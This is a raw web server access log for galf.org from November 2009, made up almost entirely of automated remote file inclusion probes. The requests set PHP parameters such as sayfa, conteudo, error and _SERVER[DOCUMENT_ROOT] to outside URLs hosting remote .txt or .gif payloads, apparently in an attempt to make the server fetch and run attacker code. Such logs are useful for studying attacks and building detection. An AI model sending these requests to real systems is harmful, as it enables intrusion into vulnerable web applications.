202.123.212.188 - - [02/Nov/2009:03:43:53 -0800] "GET /main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:43:53 -0800] "GET /logs/access_090608.log%20%20//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:43:53 -0800] "GET /logs//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:44:04 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:44:13 -0800] "GET /main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:44:13 -0800] "GET /logs/access_090427.log//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:44:13 -0800] "GET /logs//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:45:13 -0800] "GET /logs//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:45:13 -0800] "GET /logs/access_090608.log//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:45:13 -0800] "GET /main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:45:46 -0800] "GET /logs/access_090622.log//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [02/Nov/2009:03:46:57 -0800] "GET /main.php?sayfa=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
86.65.110.157 - - [02/Nov/2009:03:46:57 -0800] "GET /logs/access_090608.log//main.php?sayfa=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
86.65.110.157 - - [02/Nov/2009:03:46:57 -0800] "GET /logs//main.php?sayfa=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
86.65.110.157 - - [02/Nov/2009:03:46:58 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://www.supliment.polirom.ro/brd/idv6.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
202.123.212.188 - - [02/Nov/2009:03:47:36 -0800] "GET /logs/access_090803.log%20%20//main.php?sayfa=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
113.52.152.25 - - [02/Nov/2009:03:49:29 -0800] "GET /logs/access_090316.log////?_SERVER[DOCUMENT_ROOT]=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:03:53:10 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [02/Nov/2009:03:53:11 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [02/Nov/2009:03:53:11 -0800] "GET /logs/access.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [02/Nov/2009:03:53:42 -0800] "GET /logs/access.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [02/Nov/2009:03:53:42 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [02/Nov/2009:03:53:48 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
113.52.152.25 - - [02/Nov/2009:03:56:44 -0800] "GET /logs/scripts.log////?_SERVER[DOCUMENT_ROOT]=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:57:36 -0800] "GET /logs/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:58:08 -0800] "GET /index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:58:08 -0800] "GET /logs/access_090504.log/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:58:08 -0800] "GET /logs/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:58:28 -0800] "GET /logs/access_091012.log/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:58:28 -0800] "GET /logs/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:58:28 -0800] "GET /index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:58:29 -0800] "GET /logs/access_090525.log/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:58:53 -0800] "GET /logs/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:58:53 -0800] "GET /index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:58:53 -0800] "GET /logs/access_090525.log%20%20/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:59:19 -0800] "GET /logs/access_090525.log%20%20/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:59:19 -0800] "GET /logs/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:03:59:19 -0800] "GET /index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:04:01:45 -0800] "GET /logs/access_091012.log/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:04:01:45 -0800] "GET /logs/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:04:01:45 -0800] "GET /logs/access_090525.log/index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [02/Nov/2009:04:01:48 -0800] "GET /index.php?conteudo=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.118 - - [02/Nov/2009:04:02:16 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:04:03:18 -0800] "GET /logs/scripts.log/?dir_ws=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:04:03:18 -0800] "GET /?dir_ws=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:04:03:18 -0800] "GET /logs/?dir_ws=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:10:32 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:10:32 -0800] "GET /logs/access_090323.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:10:32 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:10:32 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:10:33 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:10:33 -0800] "GET /logs/access_090323.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:10:33 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [02/Nov/2009:04:10:36 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:13:29 -0800] "GET /components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:13:29 -0800] "GET /logs//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:13:29 -0800] "GET /logs/access_090831.log%20%20//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:13:42 -0800] "GET /logs/access_090316.log%20%20//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:14:03 -0800] "GET /logs/access_090518.log%20%20//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:14:12 -0800] "GET /logs/access_090921.log%20%20//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:14:21 -0800] "GET /logs/access_090622.log%20%20//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:14:56 -0800] "GET /logs/access_090601.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:14:56 -0800] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:14:56 -0800] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:14:56 -0800] "GET /logs/access_090525.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:15:07 -0800] "GET /logs/access_090323.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:15:18 -0800] "GET /logs/access_090907.log%20%20//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:15:38 -0800] "GET /logs/access_090706.log%20%20//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:15:48 -0800] "GET /logs/access_090608.log%20%20//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:15:48 -0800] "GET /logs/access_090525.log%20%20//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:16:05 -0800] "GET /logs/access_090427.log%20%20//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:16:10 -0800] "GET /logs/access_090914.log%20%20//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:20 -0800] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:20 -0800] "GET /logs/access_090601.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:20 -0800] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:29 -0800] "GET /logs/access_090525.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:29 -0800] "GET /logs/access_090323.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:31 -0800] "GET /logs/access_090330.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:31 -0800] "GET /logs/access_090316.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:51 -0800] "GET /logs/access_090608.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:52 -0800] "GET /logs/access_090713.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:52 -0800] "GET /logs/access_090406.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:52 -0800] "GET /logs/access_090511.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:52 -0800] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:52 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:52 -0800] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:56 -0800] "GET /logs/access_090907.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:57 -0800] "GET /logs/access_090803.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:57 -0800] "GET /logs/access_090914.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:57 -0800] "GET /logs/access_090921.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:57 -0800] "GET /logs/access_090928.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:57 -0800] "GET /logs/access_090309.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:57 -0800] "GET /logs/access_090427.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:16:57 -0800] "GET /logs/access_090629.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:36 -0800] "GET /logs/access_090330.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:37 -0800] "GET /logs/access_090316.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:47 -0800] "GET /logs/access_090608.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:47 -0800] "GET /logs/access_090713.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:54 -0800] "GET /logs/access_090406.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:54 -0800] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:54 -0800] "GET /logs/access_090511.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:54 -0800] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:54 -0800] "GET /logs/access_090907.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:55 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:55 -0800] "GET /logs/access_090803.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:55 -0800] "GET /logs/access_090921.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:55 -0800] "GET /logs/access_090309.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:59 -0800] "GET /logs/access_090427.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:04:17:59 -0800] "GET /logs/access_090629.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [02/Nov/2009:04:18:06 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.douglaschem.com//bbs/icon/private_name/.cpanel/id1.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [02/Nov/2009:04:18:06 -0800] "GET /logs/access_090316.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.douglaschem.com//bbs/icon/private_name/.cpanel/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [02/Nov/2009:04:18:06 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.douglaschem.com//bbs/icon/private_name/.cpanel/id1.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:21:22 -0800] "GET /logs/access_090511.log//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [02/Nov/2009:04:21:35 -0800] "GET /logs/access_090316.log////?_SERVER[DOCUMENT_ROOT]=http://www.douglaschem.com//bbs/icon/private_name/.cpanel/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:21:35 -0800] "GET /logs/access_090810.log//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:21:40 -0800] "GET /logs/access_090713.log//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:21:44 -0800] "GET /logs/access_090525.log//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:21:53 -0800] "GET /logs/access_090323.log//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [02/Nov/2009:04:21:58 -0800] "GET /logs/access_090330.log//components/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
